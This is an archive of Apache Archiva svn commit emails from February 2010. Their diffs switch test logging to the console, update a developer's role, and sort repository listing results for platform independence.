/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test: java/org/apache/maven/archiva/web/action/admin/repositories/RepositoriesActionTest.java resources/log4j.xml Date: Tue, 16 Feb 2010 14:30:27 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Tue Feb 16 14:30:27 2010 New Revision: 910535 URL: http://svn.apache.org/viewvc?rev=910535&view=rev Log: avoid logging to /logs in the tests Added: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/resources/log4j.xml - copied, changed from r910494, archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/resources/log4j.xml Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/admin/repositories/RepositoriesActionTest.java Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/admin/repositories/RepositoriesActionTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/admin/repositories/RepositoriesActionTest.java?rev=910535&r1=910534&r2=910535&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/admin/repositories/RepositoriesActionTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/java/org/apache/maven/archiva/web/action/admin/repositories/RepositoriesActionTest.java Tue Feb 16 14:30:27 2010 @@ -46,9 +46,6 @@ { super.setUp(); - // TODO: purely to quiet logging - shouldn't be needed - String appserverBase = getTestFile( "target/appserver-base" ).getAbsolutePath(); - System.setProperty( "appserver.base", appserverBase ); action = (RepositoriesAction) lookup( Action.class.getName(), "repositoriesAction" ); } Copied: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/resources/log4j.xml (from r910494, archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/resources/log4j.xml) URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/resources/log4j.xml?p2=archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/resources/log4j.xml&p1=archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/resources/log4j.xml&r1=910494&r2=910535&rev=910535&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/main/resources/log4j.xml (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp/src/test/resources/log4j.xml Tue Feb 16 14:30:27 2010 @@ -1,141 +1,36 @@ <?xml version="1.0" encoding="UTF-8" ?> +<!-- + ~ Licensed to the Apache Software Foundation (ASF) under one + ~ or more contributor license agreements. See the NOTICE file + ~ distributed with this work for additional information + ~ regarding copyright ownership. The ASF licenses this file + ~ to you under the Apache License, Version 2.0 (the + ~ "License"); you may not use this file except in compliance + ~ with the License. You may obtain a copy of the License at + ~ + ~ http://www.apache.org/licenses/LICENSE-2.0 + ~ + ~ Unless required by applicable law or agreed to in writing, + ~ software distributed under the License is distributed on an + ~ "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + ~ KIND, either express or implied. See the License for the + ~ specific language governing permissions and limitations + ~ under the License. + --> + <!DOCTYPE log4j:configuration SYSTEM "log4j.dtd"> <log4j:configuration xmlns:log4j="http://jakarta.apache.org/log4j/"> - <appender name="rolling" class="org.apache.log4j.DailyRollingFileAppender"> - <param name="file" value="${appserver.base}/logs/archiva.log" /> - <param name="append" value="true" /> - <param name="datePattern" value="'.'yyyy-MM-dd" /> + <appender name="console" class="org.apache.log4j.ConsoleAppender"> <layout class="org.apache.log4j.PatternLayout"> <param name="ConversionPattern" value="%d [%t] %-5p %c %x - %m%n"/> </layout> </appender> - - <appender name="auditlog" class="org.apache.log4j.DailyRollingFileAppender"> - <param name="file" value="${appserver.base}/logs/archiva-audit.log" /> - <param name="append" value="true" /> - <param name="datePattern" value="'.'yyyy-MM-dd" /> - <layout class="org.apache.log4j.PatternLayout"> - <param name="ConversionPattern" value="%d{yyyy-MM-dd HH:mm:ss} %m%n"/> - </layout> - </appender> - - <appender name="redbackAuditLog" class="org.apache.log4j.DailyRollingFileAppender"> - <param name="file" value="${appserver.base}/logs/archiva-security-audit.log" /> - <param name="append" value="true" /> - <param name="datePattern" value="'.'yyyy-MM-dd" /> - <layout class="org.apache.log4j.PatternLayout"> - <param name="ConversionPattern" value="%d{yyyy-MM-dd HH:mm:ss} - %X{redback.currentUser} - %m%n"/> - </layout> - </appender> - - <logger name="org.codehaus.plexus.redback.struts2.action.AuditEvent" additivity="false"> - <level value="info" /> - <appender-ref ref="redbackAuditLog" /> - </logger> - - <logger name="org.apache.archiva.AuditLog" additivity="false"> - <level value="info" /> - <appender-ref ref="auditlog" /> - </logger> - -<!-- INFO level loggers can use the default - <logger name="org.apache.archiva.consumers"> - <level value="info"/> - </logger> - - <logger name="org.apache.archiva"> - <level value="info"/> - </logger> - - <logger name="org.apache.maven.archiva"> - <level value="info"/> - </logger> - - <logger name="org.codehaus.redback"> - <level value="info"/> - </logger> - - <logger name="org.codehaus.plexus.redback"> - <level value="info"/> - </logger> - - <logger name="org.codehaus.plexus.mailsender.MailSender"> - <level value="info"/> - </logger> - - <logger name="org.quartz"> - <level value="info"/> - </logger> - - <logger name="org.apache.jasper"> - <level value="info"/> - </logger> - - <logger name="com.opensymphony.xwork2"> - <level value="info"/> - </logger> - - <logger name="org.apache.struts2"> - <level value="info"/> - </logger> - - <logger name="org.codehaus.plexus.PlexusContainer"> - <level value="info"/> - </logger> ---> - - <!-- WebDav objects --> - <logger name="org.apache.maven.archiva.webdav.ArchivaDavResource"> - <level value="info"/> - </logger> - - <logger name="org.apache.maven.archiva.webdav.ArchivaDavResourceFactory"> - <level value="info"/> - </logger> - - <!-- squelch noisy objects (for now) --> - <logger name="org.apache.commons"> - <level value="warn"/> - </logger> - - <logger name="net.sf.ehcache"> - <level value="warn"/> - </logger> - - <logger name="org.codehaus.plexus.velocity"> - <level value="error"/> - </logger> - - <!-- retained for Redback --> - <logger name="JPOX"> - <level value="warn"/> - </logger> - - <logger name="JPOX.MetaData"> - <level value="error"/> - </logger> - - <logger name="JPOX.RDBMS.SQL"> - <level value="error"/> - </logger> - - <logger name="SQL"> - <level value="error"/> - </logger> - - <logger name="freemarker"> - <level value="warn"/> - </logger> - - <logger name="org.codehaus.plexus.component.manager.ClassicSingletonComponentManager"> - <level value="error"/> - </logger> <root> <priority value ="info" /> - <appender-ref ref="rolling" /> + <appender-ref ref="console" /> </root> </log4j:configuration> From [email protected] Tue Feb 16 14:39:19 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59072 invoked from network); 16 Feb 2010 14:39:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Feb 2010 14:39:18 -0000 Received: (qmail 15456 invoked by uid 500); 16 Feb 2010 14:39:18 -0000 Delivered-To: [email protected] Received: (qmail 15399 invoked by uid 500); 16 Feb 2010 14:39:18 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15390 invoked by uid 99); 16 Feb 2010 14:39:18 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 14:39:18 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 16 Feb 2010 14:39:16 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 7F9F923889B2; Tue, 16 Feb 2010 14:38:54 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r910536 - /archiva/parent/pom.xml Date: Tue, 16 Feb 2010 14:38:54 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: oching Date: Tue Feb 16 14:38:54 2010 New Revision: 910536 URL: http://svn.apache.org/viewvc?rev=910536&view=rev Log: update role to emeritus Modified: archiva/parent/pom.xml Modified: archiva/parent/pom.xml URL: http://svn.apache.org/viewvc/archiva/parent/pom.xml?rev=910536&r1=910535&r2=910536&view=diff ============================================================================== --- archiva/parent/pom.xml (original) +++ archiva/parent/pom.xml Tue Feb 16 14:38:54 2010 @@ -303,7 +303,7 @@ <email>[email protected]</email> <organization>ASF</organization> <roles> - <role>PMC Member</role> + <role>Emeritus</role> </roles> <timezone>-5</timezone> </developer> From [email protected] Thu Feb 18 15:51:31 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 68686 invoked from network); 18 Feb 2010 15:51:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Feb 2010 15:51:31 -0000 Received: (qmail 18591 invoked by uid 500); 18 Feb 2010 15:51:31 -0000 Delivered-To: [email protected] Received: (qmail 18526 invoked by uid 500); 18 Feb 2010 15:51:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18515 invoked by uid 99); 18 Feb 2010 15:51:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Feb 2010 15:51:31 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Feb 2010 15:51:28 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id AD8AC23889DD; Thu, 18 Feb 2010 15:51:07 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r911453 - /archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java Date: Thu, 18 Feb 2010 15:51:07 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Thu Feb 18 15:51:07 2010 New Revision: 911453 URL: http://svn.apache.org/viewvc?rev=911453&view=rev Log: [MRM-1282] sort the results for platform independance Modified: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java Modified: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java?rev=911453&r1=911452&r2=911453&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java (original) +++ archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java Thu Feb 18 15:51:07 2010 @@ -19,18 +19,6 @@ * under the License. */ -import java.io.File; -import java.io.FilenameFilter; -import java.io.IOException; -import java.util.ArrayList; -import java.util.Arrays; -import java.util.Collection; -import java.util.Collections; -import java.util.Date; -import java.util.List; -import java.util.regex.Matcher; -import java.util.regex.Pattern; - import org.apache.archiva.checksum.ChecksumAlgorithm; import org.apache.archiva.checksum.ChecksummedFile; import org.apache.archiva.metadata.model.ArtifactMetadata; @@ -63,6 +51,18 @@ import org.slf4j.Logger; import org.slf4j.LoggerFactory; +import java.io.File; +import java.io.FilenameFilter; +import java.io.IOException; +import java.util.ArrayList; +import java.util.Arrays; +import java.util.Collection; +import java.util.Collections; +import java.util.Date; +import java.util.List; +import java.util.regex.Matcher; +import java.util.regex.Pattern; + /** * @plexus.component role="org.apache.archiva.metadata.repository.storage.StorageMetadataResolver" role-hint="maven2" */ @@ -101,8 +101,8 @@ private static final String PROBLEM_MISLOCATED_POM = "mislocated-pom"; - private static final List<String> POTENTIAL_PROBLEMS = - Arrays.asList( PROBLEM_INVALID_POM, PROBLEM_MISSING_POM, PROBLEM_MISLOCATED_POM ); + private static final List<String> POTENTIAL_PROBLEMS = Arrays.asList( PROBLEM_INVALID_POM, PROBLEM_MISSING_POM, + PROBLEM_MISLOCATED_POM ); public ProjectMetadata getProject( String repoId, String namespace, String projectId ) { @@ -127,8 +127,8 @@ File basedir = new File( repositoryConfiguration.getLocation() ); if ( VersionUtil.isSnapshot( projectVersion ) ) { - File metadataFile = - pathTranslator.toFile( basedir, namespace, projectId, projectVersion, METADATA_FILENAME ); + File metadataFile = pathTranslator.toFile( basedir, namespace, projectId, projectVersion, + METADATA_FILENAME ); try { MavenRepositoryMetadata metadata = MavenRepositoryMetadataReader.read( metadataFile ); @@ -137,8 +137,8 @@ MavenRepositoryMetadata.Snapshot snapshotVersion = metadata.getSnapshotVersion(); if ( snapshotVersion != null ) { - artifactVersion = - artifactVersion.substring( 0, artifactVersion.length() - 8 ); // remove SNAPSHOT from end + artifactVersion = artifactVersion.substring( 0, artifactVersion.length() - + 8 ); // remove SNAPSHOT from end artifactVersion = artifactVersion + snapshotVersion.getTimestamp() + "-" + snapshotVersion.getBuildNumber(); } @@ -378,8 +378,18 @@ { File dir = getRepositoryBasedir( repoId ); + List<String> rootNamespaces; String[] files = dir.list( new DirectoryFilter( filter ) ); - return files != null ? Arrays.asList( files ) : Collections.<String>emptyList(); + if ( files != null ) + { + rootNamespaces = new ArrayList<String>( Arrays.asList( files ) ); + Collections.sort( rootNamespaces ); + } + else + { + rootNamespaces = Collections.emptyList(); + } + return rootNamespaces; } private File getRepositoryBasedir( String repoId ) @@ -400,7 +410,7 @@ File dir = pathTranslator.toFile( getRepositoryBasedir( repoId ), namespace ); // scan all the directories which are potential namespaces. Any directories known to be projects are excluded - Collection<String> namespaces = new ArrayList<String>(); + List<String> namespaces = new ArrayList<String>(); File[] files = dir.listFiles( new DirectoryFilter( filter ) ); if ( files != null ) { @@ -412,6 +422,7 @@ } } } + Collections.sort( namespaces ); return namespaces; } @@ -425,7 +436,7 @@ File dir = pathTranslator.toFile( getRepositoryBasedir( repoId ), namespace ); // scan all directories in the namespace, and only include those that are known to be projects - Collection<String> projects = new ArrayList<String>(); + List<String> projects = new ArrayList<String>(); File[] files = dir.listFiles( new DirectoryFilter( filter ) ); if ( files != null ) { @@ -437,6 +448,7 @@ } } } + Collections.sort( projects ); return projects; } @@ -503,10 +515,10 @@ // TODO: very crude, migrate the functionality from the repository-layer here if ( VersionUtil.isGenericSnapshot( projectVersion ) ) { - String mainVersion = - projectVersion.substring( 0, projectVersion.length() - 8 ); // 8 is length of "SNAPSHOT" - Matcher m = Pattern.compile( projectId + "-" + mainVersion + "([0-9]{8}.[0-9]{6}-[0-9]+).*" ).matcher( - file.getName() ); + String mainVersion = projectVersion.substring( 0, projectVersion.length() - + 8 ); // 8 is length of "SNAPSHOT" + Matcher m = Pattern.compile( + projectId + "-" + mainVersion + "([0-9]{8}.[0-9]{6}-[0-9]+).*" ).matcher( file.getName() ); m.matches(); String version = mainVersion + m.group( 1 ); From [email protected] Thu Feb 18 16:15:40 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 80220 invoked from network); 18 Feb 2010 16:15:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Feb 2010 16:15:40 -0000 Received: (qmail 63817 invoked by uid 500); 18 Feb 2010 16:15:40 -0000 Delivered-To: [email protected] Received: (qmail 63754 invoked by uid 500); 18 Feb 2010 16:15:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63745 invoked by uid 99); 18 Feb 2010 16:15:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Feb 2010 16:15:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Feb 2010 16:15:37 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 05E5723889B8; Thu, 18 Feb 2010 16:15:16 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r911469 - /archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/src/main/java/org/apache/archiva/metadata/repository/file/FileMetadataRepository.java Date: Thu, 18 Feb 2010 16:15:15 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Thu Feb 18 16:15:15 2010 New Revision: 911469 URL: http://svn.apache.org/viewvc?rev=911469&view=rev Log: [MRM-1282] sort the results for platform independance Modified: archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/src/main/java/org/apache/archiva/metadata/repository/file/FileMetadataRepository.java Modified: archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/src/main/java/org/apache/archiva/metadata/repository/file/FileMetadataRepository.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/src/main/java/org/apache/archiva/metadata/repository/file/FileMetadataRepository.java?rev=911469&r1=911468&r2=911469&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/src/main/java/org/apache/archiva/metadata/repository/file/FileMetadataRepository.java (original) +++ archiva/branches/MRM-1025/archiva-modules/plugins/metadata-repository-file/src/main/java/org/apache/archiva/metadata/repository/file/FileMetadataRepository.java Thu Feb 18 16:15:15 2010 @@ -19,24 +19,6 @@ * under the License. */ -import java.io.File; -import java.io.FileInputStream; -import java.io.FileNotFoundException; -import java.io.FileOutputStream; -import java.io.IOException; -import java.util.ArrayList; -import java.util.Arrays; -import java.util.Collection; -import java.util.Date; -import java.util.HashMap; -import java.util.HashSet; -import java.util.LinkedHashSet; -import java.util.List; -import java.util.Map; -import java.util.Properties; -import java.util.Set; -import java.util.StringTokenizer; - import org.apache.archiva.metadata.model.ArtifactMetadata; import org.apache.archiva.metadata.model.CiManagement; import org.apache.archiva.metadata.model.Dependency; @@ -57,6 +39,26 @@ import org.slf4j.Logger; import org.slf4j.LoggerFactory; +import java.io.File; +import java.io.FileInputStream; +import java.io.FileNotFoundException; +import java.io.FileOutputStream; +import java.io.IOException; +import java.util.ArrayList; +import java.util.Arrays; +import java.util.Collection; +import java.util.Collections; +import java.util.Comparator; +import java.util.Date; +import java.util.HashMap; +import java.util.HashSet; +import java.util.LinkedHashSet; +import java.util.List; +import java.util.Map; +import java.util.Properties; +import java.util.Set; +import java.util.StringTokenizer; + /** * @plexus.component role="org.apache.archiva.metadata.repository.MetadataRepository" */ @@ -126,8 +128,8 @@ { updateProject( repoId, namespace, projectId ); - File directory = - new File( getDirectory( repoId ), namespace + "/" + projectId + "/" + versionMetadata.getId() ); + File directory = new File( getDirectory( repoId ), + namespace + "/" + projectId + "/" + versionMetadata.getId() ); Properties properties = readOrCreateProperties( directory, PROJECT_VERSION_METADATA_KEY ); // remove properties that are not references or artifacts @@ -288,8 +290,8 @@ Properties properties; try { - properties = - readProperties( new File( getMetadataDirectory( repositoryId, facetId ), name ), METADATA_KEY ); + properties = readProperties( new File( getMetadataDirectory( repositoryId, facetId ), name ), + METADATA_KEY ); } catch ( FileNotFoundException e ) { @@ -324,8 +326,8 @@ try { - File directory = - new File( getMetadataDirectory( repositoryId, metadataFacet.getFacetId() ), metadataFacet.getName() ); + File directory = new File( getMetadataDirectory( repositoryId, metadataFacet.getFacetId() ), + metadataFacet.getName() ); writeProperties( properties, directory, METADATA_KEY ); } catch ( IOException e ) @@ -372,6 +374,7 @@ { getArtifactsByDateRange( artifacts, repoId, ns, startTime, endTime ); } + Collections.sort( artifacts, new ArtifactComparator() ); return artifacts; } @@ -576,10 +579,10 @@ Properties properties = readOrCreateProperties( directory, PROJECT_VERSION_METADATA_KEY ); - properties.setProperty( "artifact:updated:" + artifact.getId(), - Long.toString( artifact.getFileLastModified().getTime() ) ); - properties.setProperty( "artifact:whenGathered:" + artifact.getId(), - Long.toString( artifact.getWhenGathered().getTime() ) ); + properties.setProperty( "artifact:updated:" + artifact.getId(), Long.toString( + artifact.getFileLastModified().getTime() ) ); + properties.setProperty( "artifact:whenGathered:" + artifact.getId(), Long.toString( + artifact.getWhenGathered().getTime() ) ); properties.setProperty( "artifact:size:" + artifact.getId(), Long.toString( artifact.getSize() ) ); if ( artifact.getMd5() != null ) { @@ -738,8 +741,8 @@ MailingList mailingList = new MailingList(); mailingList.setName( mailingListName ); mailingList.setMainArchiveUrl( properties.getProperty( "mailingList." + i + ".archive" ) ); - mailingList.setOtherArchives( - Arrays.asList( properties.getProperty( "mailingList." + i + ".otherArchives" ).split( "," ) ) ); + mailingList.setOtherArchives( Arrays.asList( properties.getProperty( + "mailingList." + i + ".otherArchives" ).split( "," ) ) ); mailingList.setPostAddress( properties.getProperty( "mailingList." + i + ".post" ) ); mailingList.setSubscribeAddress( properties.getProperty( "mailingList." + i + ".subscribe" ) ); mailingList.setUnsubscribeAddress( properties.getProperty( "mailingList." + i + ".unsubscribe" ) ); @@ -763,8 +766,8 @@ dependency.setArtifactId( dependencyArtifactId ); dependency.setGroupId( properties.getProperty( "dependency." + i + ".groupId" ) ); dependency.setClassifier( properties.getProperty( "dependency." + i + ".classifier" ) ); - dependency.setOptional( - Boolean.valueOf( properties.getProperty( "dependency." + i + ".optional" ) ) ); + dependency.setOptional( Boolean.valueOf( properties.getProperty( + "dependency." + i + ".optional" ) ) ); dependency.setScope( properties.getProperty( "dependency." + i + ".scope" ) ); dependency.setSystemPath( properties.getProperty( "dependency." + i + ".systemPath" ) ); dependency.setType( properties.getProperty( "dependency." + i + ".type" ) ); @@ -848,8 +851,8 @@ reference.setProjectId( properties.getProperty( "ref:reference." + i + ".projectId" ) ); reference.setNamespace( properties.getProperty( "ref:reference." + i + ".namespace" ) ); reference.setProjectVersion( properties.getProperty( "ref:reference." + i + ".projectVersion" ) ); - reference.setReferenceType( ProjectVersionReference.ReferenceType.valueOf( - properties.getProperty( "ref:reference." + i + ".referenceType" ) ) ); + reference.setReferenceType( ProjectVersionReference.ReferenceType.valueOf( properties.getProperty( + "ref:reference." + i + ".referenceType" ) ) ); references.add( reference ); } return references; @@ -956,4 +959,25 @@ { this.configuration = configuration; } + + private static class ArtifactComparator + implements Comparator<ArtifactMetadata> + { + public int compare( ArtifactMetadata artifact1, ArtifactMetadata artifact2 ) + { + if ( artifact1.getWhenGathered() == artifact2.getWhenGathered() ) + { + return 0; + } + if ( artifact1.getWhenGathered() == null ) + { + return 1; + } + if ( artifact2.getWhenGathered() == null ) + { + return -1; + } + return artifact1.getWhenGathered().compareTo( artifact2.getWhenGathered() ); + } + } } From [email protected] Thu Feb 18 16:57:11 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93343 invoked from network); 18 Feb 2010 16:57:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 18 Feb 2010 16:57:11 -0000 Received: (qmail 54142 invoked by uid 500); 18 Feb 2010 16:57:11 -0000 Delivered-To: [email protected] Received: (qmail 54089 invoked by uid 500); 18 Feb 2010 16:57:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54080 invoked by uid 99); 18 Feb 2010 16:57:11 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Feb 2010 16:57:11 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 18 Feb 2010 16:57:10 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 4EAB2238890A; Thu, 18 Feb 2010 16:56:50 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r911488 - /archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java Date: Thu, 18 Feb 2010 16:56:50 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Thu Feb 18 16:56:49 2010 New Revision: 911488 URL: http://svn.apache.org/viewvc?rev=911488&view=rev Log: [MRM-1282] sort the results for platform independance Modified: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java Modified: archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java?rev=911488&r1=911487&r2=911488&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java (original) +++ archiva/branches/MRM-1025/archiva-modules/plugins/maven2-repository/src/main/java/org/apache/archiva/metadata/repository/storage/maven2/Maven2RepositoryMetadataResolver.java Thu Feb 18 16:56:49 2010 @@ -378,18 +378,23 @@ { File dir = getRepositoryBasedir( repoId ); - List<String> rootNamespaces; + return getSortedFiles( dir, filter ); + } + + private static Collection<String> getSortedFiles( File dir, Filter<String> filter ) + { + List<String> fileNames; String[] files = dir.list( new DirectoryFilter( filter ) ); if ( files != null ) { - rootNamespaces = new ArrayList<String>( Arrays.asList( files ) ); - Collections.sort( rootNamespaces ); + fileNames = new ArrayList<String>( Arrays.asList( files ) ); + Collections.sort( fileNames ); } else { - rootNamespaces = Collections.emptyList(); + fileNames = Collections.emptyList(); } - return rootNamespaces; + return fileNames; } private File getRepositoryBasedir( String repoId ) @@ -469,8 +474,7 @@ File dir = pathTranslator.toFile( getRepositoryBasedir( repoId ), namespace, projectId ); // all directories in a project directory can be considered a version - String[] files = dir.list( new DirectoryFilter( filter ) ); - return files != null ? Arrays.asList( files ) : Collections.<String>emptyList(); + return getSortedFiles( dir, filter ); } public Collection<ArtifactMetadata> getArtifacts( String repoId, String namespace, String projectId, From [email protected] Tue Feb 23 05:37:23 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 33887 invoked from network); 23 Feb 2010 05:37:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Feb 2010 05:37:23 -0000 Received: (qmail 93018 invoked by uid 500); 23 Feb 2010 05:37:22 -0000 Delivered-To: [email protected] Received: (qmail 92956 invoked by uid 500); 23 Feb 2010 05:37:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 92947 invoked by uid 99); 23 Feb 2010 05:37:21 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 23 Feb 2010 05:37:21 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 23 Feb 2010 05:37:20 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 37DD123889E9; Tue, 23 Feb 2010 05:36:59 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r915191 - /archiva/trunk/ Date: Tue, 23 Feb 2010 